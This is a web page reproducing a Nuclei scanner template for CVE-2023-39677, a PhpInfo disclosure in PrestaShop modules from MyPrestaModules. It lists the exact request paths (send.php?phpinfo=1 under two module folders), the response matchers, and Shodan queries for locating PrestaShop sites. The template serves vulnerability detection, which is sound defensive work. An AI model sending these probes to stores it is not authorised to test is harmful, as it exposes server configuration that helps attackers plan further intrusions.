Skip to content
Nuclei Templates

PrestaShop MyPrestaModules - PhpInfo Disclosure

ID: CVE-2023-39677

Severity: high

Author: meme-lord

Tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project

Description

Section titled “Description”

PrestaShop modules by MyPrestaModules expose PHPInfo

YAML Source

Section titled “YAML Source”
id: CVE-2023-39677


info:
  name: PrestaShop MyPrestaModules - PhpInfo Disclosure
  author: meme-lord
  severity: high
  description: |
    PrestaShop modules by MyPrestaModules expose PHPInfo
  impact: |
    An attacker can exploit this vulnerability to obtain sensitive information about the server configuration, potentially leading to further attacks.
  reference:
    - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
    - https://cve.report/CVE-2023-39677
    - https://myprestamodules.com/
    - https://sorcery.ie
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-39677
    epss-score: 0.00767
    epss-percentile: 0.81177
    cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simpleimportproduct_project
    product: simpleimportproduct
    framework: prestashop
    shodan-query:
      - http.component:"PrestaShop"
      - http.component:"prestashop"
  tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/modules/simpleimportproduct/send.php?phpinfo=1"
      - "{{BaseURL}}/modules/updateproducts/send.php?phpinfo=1"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a0047304502204703d04e9d000f0655ee3339a62f45085565e66f5539b1748c448b7aa9b32e5f022100bd926125466307762ddf216153a59e0e80ec0b78c705ec6804240963979a284f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39677.yaml"

View on Github